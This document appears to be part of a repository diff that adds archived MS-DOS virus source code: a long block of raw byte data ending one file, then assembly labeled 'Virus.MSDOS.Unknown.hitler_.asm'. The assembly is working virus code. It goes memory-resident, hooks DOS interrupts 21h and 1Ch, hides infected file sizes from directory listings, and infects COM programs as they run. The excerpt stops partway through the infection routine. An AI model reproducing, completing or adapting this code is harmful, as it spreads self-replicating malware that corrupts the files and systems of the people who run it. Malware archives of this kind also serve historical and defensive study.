db 024h,01Bh,084h,06Bh,08Ch,060h,0BFh,0A4h,09Dh,0FFh,060h,0BCh,01Ah
db 000h,0B0h,066h,0CCh,054h,073h,0D8h,085h,09Bh,0C8h,055h,0C2h,020h
db 001h,072h,056h,069h,07Ch,0AAh,0A8h,07Bh,0AFh,080h,087h,090h,018h
db 065h,071h,065h,0C2h,095h,0DAh,0B1h,09Ch,0C5h,08Ah,07Bh,080h,03Dh
db 044h,051h,05Fh,06Ah,075h,089h,07Eh,082h,083h,080h,06Eh,064h,062h
db 066h,075h,083h,08Bh,0A2h,0A6h,0A9h,0BAh,08Bh,091h,076h,07Bh,07Eh
db 069h,07Bh,064h,06Dh,080h,075h,079h,06Ah,077h,07Ah,071h,078h,06Fh
db 082h,07Ah,083h,090h,088h,07Ch,07Dh,088h,085h,089h,08Ah,085h,083h
db 091h,086h,089h,085h,079h,07Fh,07Bh,083h,07Eh,077h,078h,083h,07Fh
db 082h,08Bh,076h,079h,075h,07Fh,090h,074h,079h,075h,077h,072h,085h
db 084h,076h,07Eh,074h,07Dh,07Eh,07Ah,080h,080h,07Fh,077h,07Eh,07Ah
db 080h,080h,07Fh,088h,07Ch,084h,07Fh,07Fh,080h,081h,07Eh,079h,08Ah
db 087h,086h,083h,08Dh,086h,07Ch,08Ch,07Ah,07Bh,073h,087h,098h,082h
db 083h,07Dh,083h,07Ch,075h,083h,06Dh,077h,073h,085h,085h,072h,07Ch
db 077h,082h,07Ah,07Ch,075h,06Bh,06Ch,073h,082h,073h,075h,07Eh,074h
db 081h,087h,08Dh,088h,080h,075h,07Fh,08Dh,083h,097h,084h,081h,083h
db 085h,080h,078h,07Dh,078h,07Fh,082h,087h,08Ch,078h,082h,081h,086h
db 082h,07Dh,081h,07Bh,074h,078h,084h,078h,084h,080h,07Eh,079h,075h
db 079h,072h,081h,07Dh,08Bh,07Eh,07Bh,086h,082h,086h,07Fh,07Eh,077h
db 076h,084h,07Eh,080h,074h,077h,07Fh,090h,08Ch,085h,07Ah,062h,06Ah
db 080h,08Ch,08Dh,07Eh,072h,07Bh,082h,089h,095h,08Ah,06Fh,07Ah,083h
db 082h,083h,07Bh,077h,07Ah,079h,082h,07Dh,06Eh,077h,06Eh,082h,07Eh
db 088h,07Dh,07Fh,078h,071h,081h,075h,07Ch,086h,07Fh,086h,07Eh,085h
db 081h,086h,087h,08Dh,08Ah,076h,07Ah,07Ah,086h,085h,08Ah,086h,085h
db 07Dh,077h,078h,06Eh,07Fh,07Ah,07Dh,07Eh,074h,083h,079h,088h,07Ah
db 084h,078h,073h,081h,079h,086h,083h,081h,07Fh,082h,094h,080h,080h
db 06Eh,069h,07Ch,078h,07Eh,07Bh,07Ch,072h,086h,090h,086h,07Dh,079h
db 07Eh,084h,08Bh,07Eh,080h,080h,072h,090h,088h,07Ch,079h,076h,07Bh
db 07Fh,086h,07Ah,081h,07Dh,07Dh,08Ah,07Ah,080h,070h,075h,07Eh,079h
db 085h,073h,076h,075h,087h,087h,088h,084h,07Ch,07Ah,076h,077h,07Bh
db 079h,083h,07Bh,081h,07Dh,07Ch,07Fh,080h,081h,07Fh,08Ah,082h,082h
db 08Ch,082h,086h,086h,08Ah,083h,080h,071h,073h,07Fh,077h,084h,087h
db 081h,07Bh,07Fh,07Fh,087h,086h,079h,083h,077h,087h,07Ch,07Ch,07Ch
db 075h,082h,071h,076h,07Ch,076h,079h,079h,082h,070h,080h,07Ah,081h
db 087h,084h,07Ah,070h,07Dh,06Fh,082h,084h,07Eh,081h,07Bh,07Dh,07Fh
db 08Fh,07Dh,07Ch,084h,07Eh,07Bh,086h,088h,07Eh,08Fh,089h,075h,08Ah
db 07Dh,079h,07Dh,080h,079h,07Fh,086h,077h,078h,07Dh,06Eh,08Dh,07Fh
db 074h,076h,07Eh,078h,078h,08Dh,079h,07Eh,082h,07Eh,080h,087h,079h
db 076h,082h,074h,07Eh,081h,06Eh,074h,081h,082h,081h,092h,07Bh,07Fh
db 08Fh,08Ah,08Bh,07Ch,070h,074h,08Fh,07Eh,084h,084h,06Fh,075h,07Ah
db 08Eh,07Bh,07Ch,078h,078h,083h,086h,08Eh,07Eh,082h,070h,07Dh,08Dh
db 078h,07Bh,06Fh,077h,076h,087h,085h,074h,079h,077h,07Dh,085h,084h
db 06Bh,07Eh,07Eh,077h,086h,088h,079h,07Dh,091h,07Bh,081h,09Bh,073h
db 080h,07Bh,07Bh,090h,084h,070h,07Bh,08Ah,078h,07Fh,081h,071h,07Fh
db 082h,080h,074h,081h,07Bh,06Dh,07Fh,070h,078h,089h,07Ch,077h,089h
db 08Ah,07Fh,086h,07Eh,072h,081h,073h,068h,07Fh,082h,073h,085h,08Ah
db 086h,09Eh,093h,07Bh,081h,086h,069h,07Dh,086h,06Ch,07Fh,088h,088h
db 08Fh,09Ch,08Ch,079h,086h,074h,067h,06Dh,064h,069h,077h,07Fh,084h
db 09Fh,085h,08Dh,09Bh,074h,071h,06Ch,05Dh,062h,07Dh,06Dh,073h,086h
db 090h,091h,097h,092h,07Ah,079h,07Ch,061h,06Dh,076h,073h,070h,088h
db 090h,094h,09Bh,09Bh,094h,078h,077h,078h,060h,05Dh,069h,07Bh,087h
db 090h,09Fh,09Dh,09Fh,0A1h,080h,076h,068h,053h,04Bh,066h,072h,072h
db 086h,099h,097h,0A2h,0ADh,082h,06Ah,064h,05Ah,053h,061h,06Ah,067h
db 08Ah,0ABh,0ADh,0ACh,09Bh,0A5h,060h,067h,066h,059h,056h,06Fh,093h
db 08Fh,0BFh,0A8h,08Eh,0AFh,0AAh,044h,04Fh,070h,041h,057h,08Dh,084h
db 07Dh,0D1h,094h,07Eh,0BEh,088h,02Dh,06Ah,070h,038h,07Bh,0ABh,063h
db 0AFh,0A0h,068h,075h,0CDh,064h,013h,087h,068h,02Fh,0ABh,0B4h,037h
db 097h,0E0h,050h,097h,0F8h,022h,063h,0D4h,02Ah,07Dh,0E6h,038h,02Fh
db 0F9h,080h,047h,0E7h,0DAh,010h,07Fh,084h,034h,0B7h,0B0h,01Dh,035h
db 0D7h,0C0h,04Fh,0A1h,0B2h,002h,06Fh,0DEh,014h,087h,040h,001h,077h
db 0FFh,0A0h,032h,0BDh,0E2h,05Bh,0D7h,0C0h,000h,095h,02Ah,000h,0A7h
db 0C8h,02Ch,057h,0AEh,0C4h,09Fh,0E2h,030h,03Bh,0DCh,04Ah,02Fh,0FCh
db 084h,03Ah,0A5h,0D3h,094h,0BBh,0D8h,020h,07Fh,0A0h,018h,033h,0FFh
db 06Ch,009h,0A7h,0E2h,03Ah,0AFh,08Ah,000h,087h,068h,020h,09Fh,0D0h
db 040h,05Bh,0FFh,088h,03Fh,0D5h,01Ch,027h,0A0h,036h,04Fh,0FFh,0A8h
db 042h,0EFh,0D0h,05Eh,0F3h,0A0h,000h,05Bh,045h,03Dh,0F5h,0B4h,01Eh
db 057h,0FFh,060h,087h,0DCh,000h,007h,084h,04Ch,07Dh,0FFh,071h,02Dh
db 0FFh,0C4h,037h,0CFh,064h,000h,06Fh,038h,03Dh,0FFh,0C0h,034h,09Bh
db 0FFh,054h,0A3h,0C2h,000h,05Fh,050h,01Ah,09Fh,0FFh,050h,03Fh,0FFh
db 08Ch,073h,0F7h,034h,000h,07Ah,048h,073h,0FFh,080h,029h,0EFh,0D8h
db 02Eh,0ABh,068h,000h,08Dh,036h,028h,0F3h,0D8h,044h,08Fh,0FFh,04Ah
db 0AFh,0DAh,000h,02Bh,030h,03Fh,0D3h,0E8h,05Ah,07Fh,0FFh,068h,097h
db 0E2h,000h,00Bh,021h,03Fh,0A7h,0FFh,06Ch,063h,0FFh,078h,073h,0DFh
db 050h,000h,000h,04Dh,09Fh,0FFh,082h,033h,0E7h,0C0h,059h,0AFh,098h
db 000h,02Bh,03Fh,062h,0F1h,0A6h,073h,0DFh,0FFh,040h,08Bh,0D0h,000h
db 000h,017h,05Fh,0FDh,0FFh,058h,08Fh,0FFh,06Dh,0B7h,0ECh,008h,000h
db 027h,07Bh,0C6h,0D2h,075h,097h,0FFh,060h,076h,0C8h,018h,000h,000h
db 065h,0AFh,0FFh,096h,073h,0FFh,088h,07Fh,0DAh,040h,000h,000h,07Bh
db 09Fh,0E0h,082h,069h,0FFh,0D4h,05Fh,066h,080h,000h,027h,049h,062h
db 09Dh,0AAh,099h,0FFh,0F8h,038h,096h,0D4h,000h,000h,027h,077h,0FFh
db 0FCh,068h,09Fh,0FFh,065h,0AFh,0D8h,000h,000h,02Fh,09Ah,07Fh,088h
db 06Dh,0CFh,0FFh,062h,06Dh,0B1h,028h,000h,019h,065h,0BFh,0F4h,062h
db 08Bh,0FFh,084h,077h,0EBh,054h,000h,000h,05Dh,0AFh,0FFh,08Ah,057h
db 0FFh,068h,069h,0ABh,084h,000h,000h,065h,099h,0FFh,09Ch,05Bh,0EFh
db 0E4h,09Dh,093h,09Ah,000h,000h,07Fh,093h,08Eh,089h,06Ch,0E5h,0FFh
db 05Dh,074h,0CFh,038h,000h,023h,079h,09Bh,0DEh,091h,0AFh,0FFh,05Ch
db 073h,0A7h,084h,000h,000h,046h,09Fh,0FFh,080h,053h,0DFh,0E4h,077h
db 08Ah,0B8h,000h,000h,06Bh,089h,0A4h,084h,085h,0BFh,0FFh,050h,02Bh
db 0C7h,068h,000h,00Fh,055h,0B5h,0FFh,0D0h,014h,0CFh,084h,059h,0DDh
db 0C0h,000h,000h,08Fh,0B6h,0CBh,09Ah,050h,0D7h,0FFh,026h,055h,0A2h
db 008h,000h,03Bh,06Ch,08Ah,0D3h,094h,083h,0FFh,082h,091h,0E7h,060h
db 000h,00Ch,095h,082h,09Ch,0B3h,07Ah,0E7h,0FEh,028h,059h,0D7h,058h
db 000h,001h,03Fh,0BFh,0FFh,078h,063h,0FFh,086h,0B3h,0FFh,040h,000h
db 000h,06Dh,08Fh,0D9h,0A1h,060h,0B3h,0D2h,0C7h,074h,048h,000h,045h
db 04Bh,03Bh,097h,0B8h,0A2h,0D3h,0FFh,064h,071h,0CEh,004h,00Bh,01Bh
db 052h,07Bh,0C1h,0F6h,0A4h,0C5h,0C0h,065h,072h,0C6h,000h,000h,00Ah
db 03Fh,0DFh,0FFh,058h,06Bh,0FAh,044h,0A7h,0FFh,028h,000h,03Bh,0BDh
db 0FAh,0FFh,088h,07Bh,0FFh,058h,062h,057h,060h,000h,000h,043h,08Bh
db 0FFh,098h,06Ah,0E7h,0D0h,062h,08Ah,0B0h,000h,005h,05Fh,0B5h,0B2h
db 0A4h,072h,0D7h,0FFh,038h,087h,088h,01Ch,027h,053h,06Ah,09Dh,0FFh
db 070h,075h,0FDh,048h,063h,0C5h,080h,000h,015h,06Bh,0B7h,0FFh,084h
db 048h,0A7h,0E0h,061h,0B3h,088h,000h,031h,03Eh,062h,09Bh,0ECh,058h
db 05Bh,0FFh,054h,06Bh,0B5h,0A0h,000h,000h,061h,091h,0FFh,090h,043h
db 0EFh,0B8h,09Ah,09Fh,0A8h,000h,027h,031h,05Bh,09Ch,0BAh,0B0h,0BFh
db 0F5h,04Ah,07Fh,0E5h,042h,000h,000h,056h,0BBh,0FFh,090h,03Fh,0FFh
db 090h,0BFh,0D7h,094h,000h,000h,05Fh,08Eh,0FFh,080h,04Eh,0A5h,0D8h
db 07Fh,064h,094h,000h,000h,03Bh,088h,074h,068h,0BFh,0FBh,0FFh,04Ah
db 05Fh,0A5h,092h,015h,000h,01Fh,07Bh,0FFh,0FFh,052h,0DFh,050h,09Fh
db 0D3h,0C0h,000h,000h,053h,08Dh,0FFh,098h,036h,087h,0D4h,08Bh,06Dh
db 0B4h,000h,000h,035h,07Dh,0CBh,0F8h,0BAh,074h,0FFh,078h,075h,09Ah
db 050h,000h,000h,0AEh,082h,073h,0A6h,0B0h,0FFh,0C8h,03Bh,052h,099h
db 032h,000h,023h,044h,07Fh,0FFh,0FFh,058h,087h,046h,07Bh,0F3h,0CAh
db 000h,000h,05Fh,0CAh,0FFh,0FEh,024h,077h,0B8h,039h,076h,0B4h,00Eh
db 000h,02Bh,08Eh,0ABh,0FFh,070h,063h,0FFh,080h,09Ch,0BBh,054h,000h
db 00Fh,06Ah,0A5h,0D6h,09Ah,099h,0DDh,0D4h,056h,067h,094h,000h,000h
db 01Dh,066h,0BBh,0FFh,070h,067h,0D0h,06Fh,096h,0DEh,048h,000h,036h
db 06Fh,09Ah,0FFh,070h,027h,0C9h,056h,06Ch,08Fh,084h,000h,023h,057h
db 086h,0FFh,0F4h,080h,04Fh,0F5h,06Eh,082h,0C9h,020h,000h,003h,05Bh
db 099h,0FFh,0C0h,03Ch,0EBh,080h,08Fh,09Dh,0A8h,006h,00Eh,056h,077h
db 0DFh,0FFh,060h,07Fh,0B0h,06Eh,062h,0CEh,01Ah,017h,047h,05Dh,085h
db 0FFh,0FFh,040h,097h,05Ah,05Eh,06Fh,0B4h,000h,037h,050h,07Fh,0ABh
db 0FFh,0D8h,000h,0A7h,040h,047h,07Fh,08Ch,01Ch,023h,06Dh,080h,0C7h
db 0FFh,080h,019h,0D2h,030h,056h,09Fh,070h,018h,02Dh,086h,0A8h,0FFh
db 0FFh,070h,08Fh,0A0h,03Ch,018h,09Fh,070h,00Ah,053h,095h,099h,0FFh
db 0FFh,044h,08Bh,088h,02Dh,00Fh,0ADh,044h,006h,067h,0A2h,085h,0EBh
db 0FFh,030h,04Fh,094h,013h,000h,0BBh,035h,037h,083h,08Ch,093h,0FFh
db 0FFh,040h,06Dh,0A8h,023h,027h,0AFh,034h,047h,072h,092h,07Fh,0EBh
db 0FFh,054h,04Bh,0C0h,039h,044h,09Dh,054h,055h,075h,0C6h,084h,096h
db 0FFh,0A0h,033h,0BFh,04Ch,02Ch,056h,08Ah,055h,087h,0B3h,062h,051h
db 0C7h,0DCh,02Eh,08Fh,094h,020h,02Ah,07Dh,06Eh,0BDh,0ACh,06Ch,04Ch
db 0A3h,0FFh,080h,03Eh,0B3h,030h,02Ah,04Dh,08Eh,04Dh,095h,0A3h,06Ch
db 057h,0AFh,0FFh,060h,05Bh,0D5h,032h,04Fh,06Fh,064h,05Eh,0CDh,0A0h
db 03Ah,06Fh,0CDh,0C0h,04Ah,082h,0DBh,02Ch,06Dh,04Bh,04Eh,087h,0B8h
db 06Bh,058h,07Fh,09Eh,0CCh,072h,073h,0D5h,030h,06Fh,067h,048h,05Bh
db 0BAh,09Ch,058h,07Dh,099h,0D4h,094h,06Ch,0C3h,04Ch,079h,03Eh,025h
db 06Bh,0D4h,078h,072h,07Bh,07Ah,0BBh,0C1h,04Ah,08Bh,088h,02Bh,058h
db 034h,046h,0DDh,09Ah,080h,072h,06Ch,08Fh,0FFh,070h,013h,0B1h,030h
db 086h,055h,05Fh,0C7h,0B4h,082h,075h,087h,08Dh,0FFh,078h,000h,0A7h
db 058h,07Bh,070h,03Ah,05Bh,0BCh,08Eh,0A8h,0ACh,034h,08Fh,0D8h,028h
db 05Bh,0E0h,028h,07Fh,059h,029h,0ABh,0CCh,064h,06Bh,080h,049h,0AFh
db 0D0h,023h,07Fh,0B0h,00Eh,089h,061h,02Fh,0B7h,0B2h,070h,092h,088h
db 06Fh,0EFh,090h,023h,09Bh,0B4h,035h,08Ch,03Dh,03Fh,0D3h,094h,08Bh
db 0C7h,060h,03Bh,0B9h,082h,069h,0CFh,0A0h,027h,084h,02Ah,04Bh,0EFh
db 08Ch,07Eh,08Ch,050h,05Fh,0E3h,079h,04Fh,0AFh,078h,01Bh,081h,02Ch
db 03Dh,0D3h,078h,077h,0B3h,066h,055h,0BFh,082h,069h,0B2h,0A8h,025h
db 08Ah,035h,043h,0D3h,09Ch,07Bh,09Bh,05Ah,03Dh,0AFh,0C6h,07Fh,077h
db 07Fh,062h,06Ah,096h,05Dh,073h,0AAh,06Ah,08Ch,08Ah,054h,04Fh,08Eh
db 0AAh,07Bh,06Fh,09Ch,070h,05Dh,084h,056h,07Fh,0C5h,085h,073h,060h
db 05Ah,071h,0C3h,0A8h,050h,056h,064h,071h,087h,0ACh,04Bh,071h,088h
db 074h,0A4h,08Bh,085h,069h,072h,0A9h,090h,067h,07Ch,0A8h,038h,07Fh
db 088h,05Bh,07Fh,0A5h,06Ah,073h,0B9h,05Bh,056h,0B2h,05Ah,042h,0A2h
db 0CCh,044h,037h,079h,055h,073h,0E2h,0A5h,06Bh,091h,062h,056h,0B7h
db 0ACh,051h,05Fh,0A1h,090h,02Eh,0A3h,07Eh,045h,09Fh,0A2h,07Ch,095h
db 08Ah,070h,067h,0AEh,074h,055h,0A7h,0DBh,018h,033h,066h,06Ch,07Bh
db 0C3h,090h,049h,07Dh,093h,076h,0B3h,0B0h,041h,046h,0A3h,08Dh,02Ah
db 08Fh,075h,046h,087h,0B2h,07Bh,07Eh,091h,06Eh,071h,09Fh,08Ah,069h
db 070h,092h,08Ah,04Fh,096h,090h,056h,07Dh,090h,084h,07Dh,0A1h,086h
db 066h,084h,08Bh,073h,081h,080h,084h,072h,089h,082h,06Bh,06Eh,07Fh
db 080h,077h,079h,095h,091h,059h,059h,081h,070h,069h,08Bh,08Eh,088h
db 059h,07Ch,06Dh,097h,083h,06Eh,07Fh,087h,093h,087h,078h,05Ch,078h
db 098h,07Eh,077h,08Fh,097h,062h,067h,080h,066h,07Eh,0A1h,07Ah,07Dh
db 089h,095h,078h,055h,073h,092h,08Ch,077h,07Dh,096h,092h,04Ah,05Fh
db 06Eh,087h,092h,08Ch,082h,085h,092h,078h,058h,06Ch,092h,073h,073h
db 086h,08Eh,07Fh,05Eh,04Ah,06Ch,073h,092h,0A0h,07Eh,090h,097h,08Bh
db 073h,070h,078h,089h,089h,075h,079h,08Fh,08Eh,07Ah,040h,05Fh,07Ch
db 086h,085h,0A2h,0A9h,084h,07Fh,075h,05Ch,073h,09Ch,076h,061h,07Fh
db 079h,075h,092h,082h,031h,069h,086h,076h,09Fh,0B1h,07Eh,073h,092h
db 06Bh,067h,097h,087h,074h,078h,07Ah,085h,099h,065h,067h,088h,054h
db 069h,085h,084h,087h,0A3h,08Ch,078h,09Fh,086h,053h,067h,07Ch,068h
db 075h,092h,078h,072h,07Ch,062h,07Dh,0AFh,090h,06Bh,07Ch,06Eh,068h
db 08Fh,0A0h,078h,06Ah,072h,075h,08Dh,08Ch,07Eh,089h,072h,054h,072h
db 08Bh,089h,07Fh,072h,06Bh,08Ah,0A2h,089h,08Fh,085h,066h,071h,093h
db 088h,074h,078h,06Dh,070h,08Ah,088h,089h,08Dh,072h,06Bh,080h,078h
db 079h,070h,069h,06Ch,07Ch,08Bh,082h,08Bh,078h,06Ah,087h,081h,07Eh
db 08Eh,070h,05Fh,079h,085h,07Fh,087h,07Ah,05Fh,08Ah,0A4h,076h,079h
db 080h,06Ah,069h,075h,07Eh,093h,0A5h,081h,072h,088h,088h,085h,090h
db 078h,060h,071h,07Bh,07Fh,084h,07Ah,068h,07Ah,08Ch,07Fh,07Ah,070h
db 068h,076h,07Ch,077h,093h,0A2h,080h,086h,07Dh,07Bh,083h,08Eh,068h
db 064h,074h,06Eh,077h,097h,074h,068h,080h,080h,071h,08Bh,07Ch,059h
db 079h,08Ah,074h,099h,09Ch,066h,07Fh,0A6h,07Fh,08Fh,0A0h,056h,06Dh
db 0A2h,06Ch,07Dh,09Dh,060h,05Fh,098h,072h,063h,097h,088h,048h,07Dh
db 085h,069h,0A3h,088h,04Eh,063h,09Fh,091h,077h,08Ch,074h,042h,085h
db 09Ch,06Ch,095h,066h,051h,08Fh,0CFh,07Ah,073h,09Ah,080h,065h,097h
db 080h,05Ah,081h,04Ch,04Ah,09Eh,09Ch,074h,07Fh,083h,086h,097h,09Ah
db 069h,07Fh,08Ch,060h,06Fh,0A0h,077h,06Eh,08Ch,08Eh,07Dh,083h,083h
db 064h,07Ah,074h,05Eh,079h,09Fh,07Ah,063h,083h,092h,069h,091h,088h
db 052h,075h,070h,069h,08Fh,0A0h,06Bh,074h,0ABh,08Eh,062h,08Dh,066h
db 063h,08Ah,071h,07Bh,0BBh,098h,068h,087h,0A4h,077h,097h,08Ch,044h
db 056h,069h,071h,0A7h,094h,05Dh,05Eh,0A4h,07Ch,077h,08Eh,05Ch,04Dh
db 07Eh,074h,07Bh,0ACh,078h,059h,0A3h,0A4h,060h,082h,084h,049h,075h
db 081h,07Eh,0ADh,0A5h,071h,07Fh,0BAh,074h,071h,084h,04Ah,05Bh,073h
db 071h,087h,0ADh,07Ch,062h,0ADh,093h,073h,097h,06Ah,03Fh,070h,077h
db 07Bh,0B5h,088h,058h,08Bh,0A8h,061h,079h,080h,045h,06Eh,075h,071h
db 09Bh,0B2h,072h,06Bh,0B0h,080h,078h,096h,061h,042h,05Fh,073h,08Dh
db 0B4h,088h,068h,0A3h,096h,06Fh,08Dh,07Ch,04Ah,05Eh,06Ch,07Fh,0BBh
db 0A0h,070h,08Fh,0B0h,07Eh,07Fh,08Ah,040h,030h,063h,086h,0AFh,0ACh
db 066h,063h,0B3h,080h,07Ch,07Eh,04Ch,03Fh,059h,079h,096h,09Bh,084h
db 077h,0ADh,090h,071h,085h,080h,03Eh,041h,073h,093h,0D3h,0B2h,076h
db 091h,09Ah,083h,0A3h,090h,040h,038h,05Bh,08Ah,0A7h,088h,071h,086h
db 090h,06Bh,07Eh,083h,052h,043h,057h,08Bh,0BBh,0C0h,080h,07Fh,0AAh
db 068h,07Bh,094h,050h,030h,048h,076h,09Dh,0A6h,07Dh,072h,0A7h,07Ah
db 069h,07Ah,07Dh,054h,065h,06Ch,085h,0A9h,0AAh,095h,0B2h,09Ch,059h
db 089h,0A1h,04Ch,049h,060h,07Eh,0C3h,0C0h,080h,083h,0A9h,067h,07Bh
db 08Dh,060h,03Ch,05Ah,085h,081h,07Eh,079h,08Dh,0B3h,060h,05Bh,07Bh
db 064h,03Dh,053h,06Ch,093h,0B5h,090h,08Ah,0BBh,07Ah,06Fh,08Fh,076h
db 046h,05Fh,070h,087h,0B3h,08Ch,07Ch,0AEh,078h,059h,085h,07Eh,048h
db 050h,07Bh,09Dh,0C1h,0A1h,08Fh,09Fh,098h,073h,085h,07Ch,048h,055h
db 07Ah,083h,083h,08Bh,08Bh,0A0h,0A8h,068h,06Fh,087h,05Eh,04Ah,061h
db 083h,095h,0A1h,090h,08Fh,0A8h,068h,067h,07Fh,062h,03Ah,056h,06Eh
db 097h,0B3h,087h,076h,09Fh,096h,06Ah,083h,080h,043h,056h,07Eh,088h
db 087h,08Fh,090h,0ADh,0B4h,060h,066h,08Dh,06Dh,044h,05Ch,075h,096h
db 0CAh,08Ch,063h,098h,071h,079h,087h,078h,044h,04Bh,083h,097h,09Bh
db 08Ah,07Ch,09Eh,0ACh,061h,05Fh,07Fh,062h,04Ah,067h,08Ah,095h,0BBh
db 098h,08Ch,0BDh,084h,085h,091h,06Ch,045h,059h,085h,08Bh,095h,08Bh
db 083h,0A4h,08Ch,04Dh,06Ah,08Bh,060h,048h,05Eh,07Fh,0ADh,0CCh,07Ch
db 068h,09Ch,064h,083h,089h,054h,036h,04Fh,07Dh,096h,0AFh,088h,072h
db 086h,0A0h,08Bh,074h,05Bh,04Dh,073h,078h,087h,09Eh,09Dh,092h,0A5h
db 0BCh,076h,07Bh,085h,059h,055h,06Ch,081h,093h,0A7h,0A1h,07Bh,07Ch
db 084h,06Dh,07Ch,07Bh,042h,039h,057h,07Dh,0C5h,0ACh,05Ah,071h,092h
db 06Ah,08Ah,09Fh,061h,046h,06Eh,099h,0BBh,0ABh,076h,073h,0A4h,068h
db 069h,06Fh,061h,036h,04Dh,07Bh,09Fh,0D1h,0A2h,081h,0B2h,098h,07Eh
db 093h,086h,04Bh,04Dh,077h,08Dh,0A7h,092h,07Ah,09Dh,0A0h,057h,072h
db 07Ah,05Ch,063h,065h,06Fh,09Fh,0CDh,08Dh,074h,09Ch,060h,063h,089h
db 070h,035h,046h,070h,095h,0C6h,090h,061h,085h,094h,06Ah,07Fh,07Eh
db 04Ah,05Ch,066h,076h,0A5h,0BAh,090h,087h,0BAh,082h,07Eh,095h,086h
db 04Ch,054h,07Dh,09Eh,0C9h,0A0h,06Ch,093h,086h,065h,073h,078h,03Dh
db 058h,065h,06Fh,08Ah,0AAh,090h,094h,0A1h,055h,062h,08Bh,068h,03Eh
db 04Ch,06Ch,09Bh,0D8h,090h,06Eh,0ACh,086h,07Dh,092h,076h,044h,052h
db 073h,089h,0B9h,096h,06Eh,08Dh,0A2h,065h,06Dh,084h,04Ah,05Dh,079h
db 090h,085h,094h,0ADh,0BBh,0C4h,066h,062h,083h,08Eh,056h,054h,068h
db 07Bh,0BFh,0BCh,070h,082h,063h,06Eh,08Dh,085h,040h,04Ah,069h,085h
db 0BDh,090h,05Ch,075h,09Ah,073h,07Bh,088h,050h,053h,074h,087h,097h
db 0ADh,08Eh,085h,0B3h,080h,073h,07Bh,076h,048h,059h,098h,092h,088h
db 08Ch,099h,0B6h,0A8h,05Bh,064h,081h,05Ch,050h,058h,066h,085h,0BFh
db 0A6h,072h,082h,057h,077h,0A5h,07Ch,04Dh,062h,07Bh,092h,0CAh,088h
db 054h,095h,080h,069h,07Bh,080h,04Ch,059h,07Ah,092h,0B5h,0B0h,079h
db 08Dh,09Ah,07Fh,07Fh,084h,057h,056h,076h,091h,09Fh,0A2h,088h,08Ah
db 0A5h,06Ah,06Dh,075h,05Ch,049h,062h,079h,087h,0BEh,099h,066h,08Eh
db 076h,07Eh,08Bh,074h,04Dh,05Bh,077h,089h,0AFh,0A0h,061h,07Bh,082h
db 065h,077h,08Eh,068h,068h,073h,08Eh,0A6h,0CAh,08Dh,065h,087h,08Bh
db 084h,076h,07Ch,054h,063h,075h,08Ah,0ADh,0B5h,078h,077h,093h,06Fh
db 07Bh,086h,060h,05Dh,068h,07Ah,093h,0C5h,08Ch,055h,083h,069h,071h
db 076h,072h,056h,05Ch,06Bh,081h,0ADh,0C4h,080h,067h,07Ah,061h,077h
db 096h,07Ah,072h,06Dh,07Eh,095h,0C2h,0B8h,064h,06Fh,072h,069h,078h
db 09Ah,078h,06Eh,073h,087h,0A7h,0CEh,098h,050h,07Eh,073h,074h,07Dh
db 088h,062h,066h,07Fh,091h,09Fh,0C3h,080h,058h,07Eh,060h,065h,081h
db 078h,057h,05Fh,088h,08Ch,0A0h,0B5h,076h,057h,070h,058h,070h,094h
db 075h,05Ch,077h,09Ch,08Ah,0A3h,0B8h,068h,05Fh,08Ch,06Dh,06Ah,095h
db 07Bh,06Bh,085h,093h,08Ah,0AFh,0B0h,064h,05Fh,08Fh,063h,069h,08Fh
db 067h,063h,07Dh,08Ah,082h,0A9h,0A8h,05Eh,05Dh,08Ah,060h,06Ah,089h
db 074h,073h,07Fh,092h,07Ch,089h,0B3h,081h,05Fh,093h,072h,066h,07Ah
db 08Eh,07Eh,089h,094h,080h,07Eh,09Fh,098h,064h,088h,
slutt:
size equ $-100h
pgf equ ($+16)/16


701
MSDOS/Virus.MSDOS.Unknown.hitler_.asm Normal file
View File

@ -0,0 +1,701 @@
call rakett
old db <20>!­'
rakett: pop bp
push bp
add bp,-103h
mov ax,42ABh
int 21h
jnc failed
cli
mov ax,3521h
int 21h
mov w [bp+offset old21],bx
mov w [bp+offset old21+2],es
mov al,1Ch
int 21h
cli
mov w [bp+offset old1C],bx
mov w [bp+offset old1C+2],es
mov w [bp+offset teller],16380
sti
call normalspeed
mov si,ds
std
lodsb
cld
mov ds,si
xor bx,bx
mov cx,pgf
cmp b [bx],'Z'
jne failed
mov ax,[bx+3]
sub ax,cx
jc failed
mov [bx+3],ax
sub [bx+12h],cx
mov es,[bx+12h]
push cs
pop ds
mov di,100h
mov si,bp
add si,di
mov cx,size
rep movsb
push es
pop ds
mov ax,2521h
mov dx,offset ni21
int 21h
mov al,1Ch
mov dx,offset ni1C
int 21h
failed: push cs
push cs
pop ds
pop es
pop si
mov di,100h
push di
movsw
movsw
movsb
mov cx,0FFh
mov si,100h
ret
findFCB: popf
call int21
pushf
or al,al
jnz backFCB
call stealth
backFCB: popf
iret
stealth: push ax
push bx
push dx
push es
mov ah,2Fh
call int21
cmp byte es:[bx],0FFh
jne normFCB
add bx,8
normFCB: mov al,byte es:[bx+16h]
and al,31
xor al,31
jnz shitFCB
mov ax,word es:[bx+1Ch]
mov dx,word es:[bx+1Ch+2]
sub ax,size
sbb dx,0
jc shitFCB
mov word es:[bx+1Ch],ax
mov word es:[bx+1Ch+2],dx
shitFCB:
pop es
pop dx
pop bx
pop ax
ret
ni21: pushf
cmp ah,11h
je findFCB
cmp ah,12h
je findFCB
cmp ax,42ABh
jne not_42AB
popf
clc
retf 2
not_42AB:
cmp ax,4B00h
jne not_4B00
call install_24
push ax
push bx
push cx
push dx
push ds
push bp
mov ax,4300h
call int21
jc back1
mov cs:old_attr,cx
test cl,4
jnz back1
mov ax,4301h
xor cx,cx
call int21
jc back1
push dx
push ds
call infect
pop ds
pop dx
mov ax,4301h
db 0B9h ;mov CX,...
old_attr dw 0
call int21
back1: ;go here if the attrib-get fails
pop bp
pop ds
pop dx
pop cx
pop bx
pop ax
call remove_24
not_4B00:
back: popf
db 0EAh
old21 dw 0,0
int21: pushf
call dword ptr cs:old21
ret
infect: mov ax,3D02h
call int21
jnc okay_open
bad1: ret
okay_open: xchg bx,ax
mov ax,5700h
call int21
push cx
mov bp,sp
push dx
mov ah,3Fh
mov cx,5
mov dx,offset old
push cs
pop ds
call int21
jc close
cmp al,5
jne close
cmp word old[0],'MZ'
je close
cmp word old[0],'ZM'
je close
cmp old[0],0E9h
jne infect1
cmp word old[3],'­!'
jne infect1
close: pop dx
pop cx
mov ax,5701h
call int21
mov ah,3Eh
call int21
ret
infect1: mov ax,4202h
xor cx,cx
xor dx,dx
call int21
or dx,dx
jnz close
cmp ax,59000
jae close
dec ax
dec ax
dec ax
